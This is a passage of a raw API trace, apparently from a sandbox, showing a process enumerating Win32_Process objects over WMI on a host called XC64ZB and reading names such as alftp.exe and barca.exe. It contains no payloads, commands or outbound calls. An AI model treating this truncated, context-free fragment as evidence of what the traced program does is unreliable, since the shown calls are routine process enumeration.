returned 0x0 [0264.995] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523620, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.995] WbemDefPath:IUnknown:Release (This=0x5523620) returned 0x3 [0264.995] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.054] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.054] WbemDefPath:IUnknown:Release (This=0x5515068) returned 0x2 [0265.054] WbemDefPath:IUnknown:Release (This=0x5515068) returned 0x1 [0265.054] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.054] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.054] WbemDefPath:IUnknown:QueryInterface (in: This=0x5515068, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5515068) returned 0x0 [0265.054] WbemDefPath:IUnknown:AddRef (This=0x5515068) returned 0x3 [0265.055] WbemDefPath:IUnknown:Release (This=0x5515068) returned 0x2 [0265.055] WbemDefPath:IWbemPath:SetText (This=0x5515068, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1184\"") returned 0x0 [0265.055] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.055] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.055] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.055] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.055] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.055] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.055] IWbemClassObject:Get (in: This=0x551fa68, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d4e58*=0, plFlavor=0x23d4e5c*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x23d4e58*=8, plFlavor=0x23d4e5c*=0) returned 0x0 [0265.055] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0265.055] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0265.056] IWbemClassObject:Get (in: This=0x551fa68, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d4e58*=8, plFlavor=0x23d4e5c*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x23d4e58*=8, plFlavor=0x23d4e5c*=0) returned 0x0 [0265.056] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0265.056] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0265.056] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.056] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x551eda8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.056] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551eda8) returned 0x0 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.057] IUnknown:AddRef (This=0x551eda8) returned 0x3 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551edac) returned 0x0 [0265.057] IMarshal:GetUnmarshalClass (in: This=0x551edac, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.057] IUnknown:Release (This=0x551edac) returned 0x3 [0265.057] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.057] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.057] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.058] IUnknown:Release (This=0x551eda8) returned 0x2 [0265.058] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.058] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.058] IUnknown:QueryInterface (in: This=0x551eda8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551eda8) returned 0x0 [0265.058] IUnknown:AddRef (This=0x551eda8) returned 0x4 [0265.058] IUnknown:Release (This=0x551eda8) returned 0x3 [0265.058] IUnknown:Release (This=0x551eda8) returned 0x2 [0265.058] CoTaskMemFree (pv=0x54ba398) [0265.058] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.058] IUnknown:AddRef (This=0x551eda8) returned 0x3 [0265.058] IWbemClassObject:Get (in: This=0x551eda8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.058] IWbemClassObject:Get (in: This=0x551eda8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3096\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.058] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3096\"") returned 0x5e [0265.058] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3096\"") returned 0x5e [0265.058] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.058] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.059] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.059] IUnknown:Release (This=0x601a94) returned 0x1 [0265.059] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2c8) returned 0x0 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2c8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.060] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2c8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x5514c78) returned 0x0 [0265.060] WbemDefPath:IUnknown:Release (This=0x54ba2c8) returned 0x0 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x5514c78) returned 0x0 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.060] WbemDefPath:IUnknown:AddRef (This=0x5514c78) returned 0x3 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.060] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5523890) returned 0x0 [0265.060] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5523890, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.060] WbemDefPath:IUnknown:Release (This=0x5523890) returned 0x3 [0265.061] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0265.061] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0265.061] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.061] WbemDefPath:IUnknown:Release (This=0x5514c78) returned 0x2 [0265.061] WbemDefPath:IUnknown:Release (This=0x5514c78) returned 0x1 [0265.061] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0265.061] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0265.061] WbemDefPath:IUnknown:QueryInterface (in: This=0x5514c78, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x5514c78) returned 0x0 [0265.061] WbemDefPath:IUnknown:AddRef (This=0x5514c78) returned 0x3 [0265.061] WbemDefPath:IUnknown:Release (This=0x5514c78) returned 0x2 [0265.061] WbemDefPath:IWbemPath:SetText (This=0x5514c78, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3096\"") returned 0x0 [0265.061] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.061] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.061] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.061] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.061] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.061] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.061] IWbemClassObject:Get (in: This=0x551eda8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d56dc*=0, plFlavor=0x23d56e0*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x23d56dc*=8, plFlavor=0x23d56e0*=0) returned 0x0 [0265.062] SysStringByteLen (bstr="barca.exe") returned 0x12 [0265.062] SysStringByteLen (bstr="barca.exe") returned 0x12 [0265.062] IWbemClassObject:Get (in: This=0x551eda8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23d56dc*=8, plFlavor=0x23d56e0*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x23d56dc*=8, plFlavor=0x23d56e0*=0) returned 0x0 [0265.062] SysStringByteLen (bstr="barca.exe") returned 0x12 [0265.062] SysStringByteLen (bstr="barca.exe") returned 0x12 [0265.062] CoTaskMemAlloc (cb=0x4) returned 0x54ba1d8 [0265.062] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba1d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba1d8*=0x551fd98, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.063] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x551fd98) returned 0x0 [0265.063] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.063] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.064] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.064] IUnknown:AddRef (This=0x551fd98) returned 0x3 [0265.064] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.064] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.064] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x551fd9c) returned 0x0 [0265.064] IMarshal:GetUnmarshalClass (in: This=0x551fd9c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.064] IUnknown:Release (This=0x551fd9c) returned 0x3 [0265.064] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0265.064] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0265.064] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.064] IUnknown:Release (This=0x551fd98) returned 0x2 [0265.064] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0265.064] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0265.064] IUnknown:QueryInterface (in: This=0x551fd98, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x551fd98) returned 0x0 [0265.065] IUnknown:AddRef (This=0x551fd98) returned 0x4 [0265.065] IUnknown:Release (This=0x551fd98) returned 0x3 [0265.065] IUnknown:Release (This=0x551fd98) returned 0x2 [0265.065] CoTaskMemFree (pv=0x54ba1d8) [0265.065] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0265.065] IUnknown:AddRef (This=0x551fd98) returned 0x3 [0265.065] IWbemClassObject:Get (in: This=0x551fd98, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.065] IWbemClassObject:Get (in: This=0x551fd98, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3772\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.065] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3772\"") returned 0x5e [0265.065] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3772\"") returned 0x5e [0265.066] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.066] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.066] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.066] IUnknown:Release (This=0x601a94) returned 0x1 [0265.067] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.068] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.068] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 